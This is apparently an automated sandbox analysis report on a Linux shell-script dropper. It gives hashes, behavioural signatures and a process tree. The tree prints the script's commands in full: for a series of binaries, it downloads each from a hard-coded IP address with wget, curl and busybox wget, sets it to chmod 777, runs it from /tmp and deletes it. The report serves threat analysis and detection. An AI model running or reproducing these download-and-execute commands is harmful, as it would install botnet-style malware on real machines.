Analysis
-
max time kernel
25s -
max time network
66s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/11/2024, 07:02
Static task
static1
Behavioral task
behavioral1
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
-
Size
10KB
-
MD5
a1defdb85efc4f43f3026f633f9d8642
-
SHA1
50c5a077d2f6661aae89e985d3ed38d1c6678db1
-
SHA256
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2
-
SHA512
ccce629290ff01417dcfcaa9313b1d4fe996f2d0131a5e211a0d9b41c81883bc0aced8f92fce2e96cc8216fcd2be2d5c1703f77c54706880e444a2bbe868b459
-
SSDEEP
192:hhYH7jooSYSyovzbEXvHC+OU1RZEEhWsRH7jooECSyovzkXvHC+V1RZEEs:Pp1tOo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 817 chmod 835 chmod 684 chmod 699 chmod 723 chmod 748 chmod 780 chmod 829 chmod 758 chmod 797 chmod 803 chmod 810 chmod 823 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 685 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe 700 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz 725 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne 749 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo 760 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw 782 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 798 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ 804 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO 811 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ 818 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG 824 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc 830 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a 836 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a curl File opened for modification /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 curl File opened for modification /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe curl File opened for modification /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo curl File opened for modification /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw curl File opened for modification /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ curl File opened for modification /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ curl File opened for modification /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc curl File opened for modification /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz curl File opened for modification /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne curl File opened for modification /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 curl File opened for modification /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO curl File opened for modification /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG curl
Processes
-
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:654
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:660
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:675
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:682
-
-
/bin/chmodchmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:686
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:687
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:690
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:693
-
-
/bin/chmodchmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Executes dropped EXE
PID:700
-
-
/bin/rmrm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:702
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:703
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:717
-
-
/bin/chmodchmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Executes dropped EXE
PID:725
-
-
/bin/rmrm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:726
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:727
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:743
-
-
/bin/chmodchmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:750
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:751
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:754
-
-
/bin/chmodchmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:761
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:762
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:775
-
-
/bin/chmodchmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:784
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:785
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:796
-
-
/bin/chmodchmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8./nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:799
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:800
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:802
-
-
/bin/chmodchmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:805
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:806
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:808
-
-
/bin/chmodchmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:813
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:816
-
-
/bin/chmodchmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:819
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:820
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:822
-
-
/bin/chmodchmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:825
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:826
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:828
-
-
/bin/chmodchmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:831
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:832
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:834
-
-
/bin/chmodchmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:837
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:838
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97